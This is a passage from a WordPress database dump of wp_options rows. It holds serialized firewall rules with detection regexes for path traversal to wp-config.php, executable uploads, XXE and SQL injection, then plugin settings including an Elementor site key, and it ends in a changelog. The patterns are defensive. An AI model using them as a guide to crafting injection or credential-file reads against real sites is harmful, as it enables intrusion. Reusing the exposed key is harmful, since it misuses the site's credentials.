)(\\.\\.?(\\\\|\\/)+)+wp\\-config\\.php/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:43:\"/(^|\\/|\\\\)(\\.\\.?(\\\\|\\/)+)+wp\\-config\\.php/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:3;a:5:{s:2:\"id\";i:5;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:94:\"/\\.(p(h(pt?|t(ml?)?|ar)[0-9]?|l|y)|(j|a)sp|aspx|sh|shtml|html?|cgi|htaccess|user\\.ini)($|\\.)/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getFileNames\";s:4:\"args\";a:0:{}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:4;a:5:{s:2:\"id\";i:6;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:60:\"/^\\/(?:\\.\\/)*(?:var|home|usr|mnt|media|etc|tmp|dev|proc)\\//i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:60:\"/^\\/(?:\\.\\/)*(?:var|home|usr|mnt|media|etc|tmp|dev|proc)\\//i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:5;a:5:{s:2:\"id\";i:7;s:5:\"level\";N;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:48:\"/<\\!(?:DOCTYPE|ENTITY)\\s+(?:%\\s*)?\\w+\\s+SYSTEM/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:48:\"/<\\!(?:DOCTYPE|ENTITY)\\s+(?:%\\s*)?\\w+\\s+SYSTEM/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:6;a:5:{s:2:\"id\";i:8;s:5:\"level\";N;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:22:\"/(^|\\/|\\\\)\\.\\.(\\\\|\\/)/\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:22:\"/(^|\\/|\\\\)\\.\\.(\\\\|\\/)/\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:7;a:5:{s:2:\"id\";i:9;s:5:\"level\";N;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"greaterThan\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:2;}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"maxMatchCount\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"CONST\";s:5:\"value\";s:15:\"BVFW::SQLIREGEX\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"greaterThan\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:2;}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"maxMatchCount\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"CONST\";s:5:\"value\";s:15:\"BVFW::SQLIREGEX\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:8;a:5:{s:2:\"id\";i:10;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"CONST\";s:5:\"value\";s:14:\"BVFW::XSSREGEX\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:9;a:5:{s:2:\"id\";i:11;s:5:\"level\";N;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"CONST\";s:5:\"value\";s:14:\"BVFW::XSSREGEX\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:10:\"getHeaders\";s:4:\"args\";a:0:{}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:10;a:5:{s:2:\"id\";i:12;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:51:\"/union(\\s|\\/\\*.*\\*\\/)(all(\\s|\\/\\*.*\\*\\/)|)select/ix\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:51:\"/union(\\s|\\/\\*.*\\*\\/)(all(\\s|\\/\\*.*\\*\\/)|)select/ix\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:11;a:5:{s:2:\"id\";i:13;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:51:\"/order(\\s|\\/\\*.*\\*\\/)by(\\s|\\/\\*.*\\*\\/).*(\\-\\-.|#)/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:51:\"/order(\\s|\\/\\*.*\\*\\/)by(\\s|\\/\\*.*\\*\\/).*(\\-\\-.|#)/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:12;a:5:{s:2:\"id\";i:14;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:22:\"/information_schema/ix\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:22:\"/information_schema/ix\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:13;a:5:{s:2:\"id\";i:15;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:2:\"OR\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:667:\"/(\\s|\\.)(wp_commentmeta|wp_comments|wp_links|wp_options|wp_postmeta|wp_posts|wp_posts2|wp_statistics_exclusions|wp_statistics_historical|wp_statistics_pages|wp_statistics_search|wp_statistics_useronline|wp_statistics_visit|wp_statistics_visitor|wp_term_relationships|wp_term_taxonomy|wp_termmeta|wp_terms|wp_usermeta|wp_users|wp_wfblockediplog|wp_wfblocks7|wp_wfconfig|wp_wfcrawlers|wp_wffilechanges|wp_wffilemods|wp_wfhits|wp_wfhoover|wp_wfissues|wp_wfknownfilelist|wp_wflivetraffichuman|wp_wflocs|wp_wflogins|wp_wfls_2fa_secrets|wp_wfls_settings|wp_wfnotifications|wp_wfpendingissues|wp_wfreversecache|wp_wfsnipcache|wp_wfstatus|wp_wftrafficrates)(\\b|\\.|\\-\\-\\s|#)/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:667:\"/(\\s|\\.)(wp_commentmeta|wp_comments|wp_links|wp_options|wp_postmeta|wp_posts|wp_posts2|wp_statistics_exclusions|wp_statistics_historical|wp_statistics_pages|wp_statistics_search|wp_statistics_useronline|wp_statistics_visit|wp_statistics_visitor|wp_term_relationships|wp_term_taxonomy|wp_termmeta|wp_terms|wp_usermeta|wp_users|wp_wfblockediplog|wp_wfblocks7|wp_wfconfig|wp_wfcrawlers|wp_wffilechanges|wp_wffilemods|wp_wfhits|wp_wfhoover|wp_wfissues|wp_wfknownfilelist|wp_wflivetraffichuman|wp_wflocs|wp_wflogins|wp_wfls_2fa_secrets|wp_wfls_settings|wp_wfnotifications|wp_wfpendingissues|wp_wfreversecache|wp_wfsnipcache|wp_wfstatus|wp_wftrafficrates)(\\b|\\.|\\-\\-\\s|#)/i\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"getGetParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:14;a:5:{s:2:\"id\";i:16;s:5:\"level\";N;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:3:\"AND\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:5:\"match\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"CONST\";s:5:\"value\";s:14:\"BVFW::XSSREGEX\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:8:\"notMatch\";s:4:\"args\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:71:\"/rocket_saas_warmup|rocket_rucss_warmup_resource_fetcher|fpd_product/ix\";}i:1;a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:13:\"getPostParams\";s:4:\"args\";a:0:{}}}}}s:19:\"min_rule_engine_ver\";d:0.1;}i:15;a:5:{s:2:\"id\";i:17;s:5:\"level\";i:2;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPAction\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:11:\"delete_user\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:13:\"preDeleteUser\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:3;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:1:{s:7:\"rule_id\";i:17;}}}}s:19:\"min_rule_engine_ver\";d:0.3;}i:16;a:5:{s:2:\"id\";i:20;s:5:\"level\";i:2;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPFilter\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:28:\"wp_insert_post_empty_content\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:19:\"preInsertUpdatePost\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:2;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:2:{s:7:\"rule_id\";i:20;s:17:\"posts_to_consider\";a:2:{i:0;s:4:\"page\";i:1;s:4:\"post\";}}}}}s:19:\"min_rule_engine_ver\";d:0.3;}i:17;a:5:{s:2:\"id\";i:21;s:5:\"level\";i:2;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPAction\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:13:\"delete_option\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:15:\"preDeleteOption\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:1;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:2:{s:7:\"rule_id\";i:21;s:19:\"options_to_consider\";a:10:{i:0;s:4:\"home\";i:1;s:8:\"blogname\";i:2;s:15:\"blogdescription\";i:3;s:18:\"users_can_register\";i:4;s:11:\"admin_email\";i:5;s:16:\"mailserver_login\";i:6;s:14:\"mailserver_url\";i:7;s:15:\"mailserver_pass\";i:8;s:15:\"mailserver_port\";i:9;s:13:\"wp_user_roles\";}}}}}s:19:\"min_rule_engine_ver\";d:0.3;}i:18;a:5:{s:2:\"id\";i:22;s:5:\"level\";i:2;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPFilter\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:17:\"pre_update_option\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:15:\"preUpdateOption\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:3;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:2:{s:7:\"rule_id\";i:22;s:19:\"options_to_consider\";a:9:{i:0;s:4:\"home\";i:1;s:8:\"blogname\";i:2;s:15:\"blogdescription\";i:3;s:18:\"users_can_register\";i:4;s:11:\"admin_email\";i:5;s:16:\"mailserver_login\";i:6;s:14:\"mailserver_url\";i:7;s:15:\"mailserver_pass\";i:8;s:15:\"mailserver_port\";}}}}}s:19:\"min_rule_engine_ver\";d:0.4;}i:19;a:5:{s:2:\"id\";i:23;s:5:\"level\";i:2;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPFilter\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:15:\"pre_delete_post\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:15:\"preDeletePostV2\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:2;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:2:{s:7:\"rule_id\";i:23;s:17:\"posts_to_consider\";a:2:{i:0;a:2:{i:0;s:4:\"page\";i:1;s:7:\"publish\";}i:1;a:2:{i:0;s:4:\"post\";i:1;s:7:\"publish\";}}}}}}s:19:\"min_rule_engine_ver\";d:0.4;}i:20;a:5:{s:2:\"id\";i:24;s:5:\"level\";i:2;s:7:\"actions\";a:1:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPFilter\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:16:\"insert_user_meta\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:17:\"preUserCreationV2\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:4;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:2:{s:7:\"rule_id\";i:24;s:17:\"roles_not_allowed\";a:4:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";}}}}}s:19:\"min_rule_engine_ver\";d:0.4;}i:21;a:5:{s:2:\"id\";i:29;s:5:\"level\";i:2;s:7:\"actions\";a:2:{i:0;a:1:{s:4:\"type\";s:7:\"INSPECT\";}i:1;a:1:{s:4:\"type\";s:5:\"BLOCK\";}}s:10:\"rule_logic\";a:3:{s:4:\"type\";s:3:\"AND\";s:12:\"left_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:12:\"matchActions\";s:4:\"args\";a:1:{i:0;a:2:{s:4:\"type\";s:5:\"ARRAY\";s:5:\"value\";a:1:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:14:\"elementor_ajax\";}}}}}s:13:\"right_operand\";a:3:{s:4:\"type\";s:8:\"FUNCTION\";s:4:\"name\";s:11:\"addWPFilter\";s:4:\"args\";a:5:{i:0;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:17:\"pre_update_option\";}i:1;a:2:{s:4:\"type\";s:6:\"STRING\";s:5:\"value\";s:15:\"preUpdateOption\";}i:2;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:10;}i:3;a:2:{s:4:\"type\";s:6:\"NUMBER\";s:5:\"value\";i:3;}i:4;a:2:{s:4:\"type\";s:4:\"HASH\";s:5:\"value\";a:2:{s:7:\"rule_id\";i:29;s:19:\"options_to_consider\";a:15:{i:0;s:7:\"siteurl\";i:1;s:4:\"home\";i:2;s:8:\"blogname\";i:3;s:15:\"blogdescription\";i:4;s:18:\"users_can_register\";i:5;s:11:\"admin_email\";i:6;s:16:\"mailserver_login\";i:7;s:14:\"mailserver_url\";i:8;s:15:\"mailserver_pass\";i:9;s:15:\"mailserver_port\";i:10;s:13:\"wp_user_level\";i:11;s:15:\"wp_capabilities\";i:12;s:13:\"wp_user_roles\";i:13;s:14:\"active_plugins\";i:14;s:12:\"default_role\";}}}}}}s:19:\"min_rule_engine_ver\";d:0.4;}}','no'),
(414563,'wordfence_ls_version','1.1.12','yes'),
(414564,'wordfence_version','7.11.7','yes'),
(414565,'wordfence_case','1','yes'),
(414566,'wordfenceActivated','1','yes'),
(425927,'wp_attachment_pages_enabled','1','yes'),
(440598,'elementor_connect_site_key','bc175e9811d3a9f3778f240852b50497','yes'),
(440601,'_elementor_notifications_data','a:2:{s:7:\"timeout\";i:1758640445;s:5:\"value\";s:2:\"[]\";}','off'),
(445253,'using_application_passwords','1','no'),
(448689,'_site_transient_wp_plugin_dependencies_plugin_data','a:0:{}','off'),
(448697,'elementor_pro_install_history','a:7:{s:6:\"3.13.2\";i:1720765791;s:6:\"3.22.1\";i:1721245751;s:6:\"3.22.3\";i:1720765792;s:6:\"3.23.0\";i:1721245752;s:6:\"3.23.3\";i:1723447762;s:6:\"3.26.3\";i:1737383315;s:6:\"3.29.2\";i:1750873311;}','yes'),
(452822,'_elementor_global_css','a:7:{s:4:\"time\";i:1723448667;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;b:0;s:3:\"css\";s:0:\"\";}','auto'),
(472381,'elementor_checklist','{\"last_opened_timestamp\":null,\"first_closed_checklist_in_editor\":false,\"is_popup_minimized\":false,\"steps\":[]}','auto'),
(472395,'_transient_wp_styles_for_blocks','a:2:{s:4:\"hash\";s:32:\"dc1b8f8e8ae79f2cb16614078265e3f4\";s:6:\"blocks\";a:6:{s:11:\"core/button\";s:0:\"\";s:14:\"core/site-logo\";s:0:\"\";s:18:\"core/post-template\";s:0:\"\";s:18:\"core/term-template\";s:0:\"\";s:12:\"core/columns\";s:0:\"\";s:14:\"core/pullquote\";s:69:\":root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}\";}}','on'),
(474265,'wp_0c392e1d3464e4a84d9ca7023bed7753','1738559837','off'),
(479037,'wp_67c141bf93011ad76a4930d200843c73','1741713614','off'),
(484267,'wp_bcc343e2183bdde60cfce0afd37f0b3e','1758032051','off'),
(484310,'elementor_landing_pages_activation','0','auto'),
(484319,'_hello-elementor_notifications','a:2:{s:7:\"timeout\";i:1771840394;s:5:\"value\";s:2:\"[]\";}','off'),
(491997,'e_editor_counter','16','auto'),
(492002,'elementor_safe_mode_allowed_plugins','a:2:{s:9:\"elementor\";s:23:\"elementor/elementor.php\";s:13:\"elementor_pro\";s:31:\"elementor-pro/elementor-pro.php\";}','auto'),
(492003,'elementor_safe_mode_created_mu_dir','1','auto'),
(492033,'elementor_1_elementor_updater_batch_ce5e5dc52de275d2e9c0dd506e91','a:1:{i:0;a:1:{s:8:\"callback\";a:2:{i:0;s:31:\"Elementor\\Core\\Upgrade\\Upgrades\";i:1;s:16:\"_on_each_version\";}}}','off'),
(492059,'_elementor_local_google_fonts','a:2:{s:6:\"roboto\";a:2:{s:3:\"url\";s:79:\"http://ictbank.ir/blog/wp-content/uploads/elementor/google-fonts/css/roboto.css\";s:7:\"version\";i:1750873535;}s:10:\"robotoslab\";a:2:{s:3:\"url\";s:83:\"http://ictbank.ir/blog/wp-content/uploads/elementor/google-fonts/css/robotoslab.css\";s:7:\"version\";i:1750873577;}}','auto'),
(492564,'wp_f45d4708771edb78e2f455f8ed06b2c3','1751143668','off'),
(492565,'wp_78214511ca13053ae324cf269390651b','1756002082','off'),
(492569,'wp_ddb2a14e73755b48f46001658c6c163e','1751143704','off'),
(492638,'elementor_pro_remote_info_api_data_3.29.2','a:2:{s:7:\"timeout\";i:1751226771;s:5:\"value\";s:242110:\"{\"stable_version\":\"3.29.2\",\"last_updated\":\"2025-06-04 14:56:19\",\"sections\":\"a:2:{s:11:\\\"description\\\";s:161:\\\"Elementor Pro adds new features to the Elementor Page Builder plugin. Control your conversions, your user engagement, your entire website, from one page builder.\\\";s:9:\\\"changelog\\\";s:226546:\\\"<h2>Elementor Pro - by Elementor.com<\\/h2>\\n<h4>3.29.2 - 2025-06-04<\\/h4>\\n<ul>\\n<li>Tweak: Added selectors to Menu widget for compatibility with Optimized Markup experiment<\\/li>\\n<\\/ul>\\n<h4>3.29.1 - 2025-05-28<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Price Table widget<\\/li>\\n<\\/ul>\\n<h4>3.29.0 - 2025-05-19<\\/h4>\\n<ul>\\n<li>New: Introduced Cloud Templates - save, manage, and reuse your templates across all your sites from a single cloud library<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> attributes in Share Buttons widget<\\/li>\\n<li>Tweak: Improved accessibility by grouping content with <code>role=region<\\/code> in the Video Playlist widget<\\/li>\\n<li>Fix: Focus color is not applied correctly for accessibility in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24239\\\">#24239<\\/a>)<\\/li>\\n<li>Fix: Common scripts loaded late when using the Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.28.4 - 2025-05-05<\\/h4>\\n<ul>\\n<li>Fix: Empty results appeared on the frontend when using the Taxonomy Filter with the \'Avoid Duplicates\' option in Loop Grid widget<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled and the Optimized Markup experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.28.3 - 2025-04-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved sidebar navigation flow on the Elementor Home 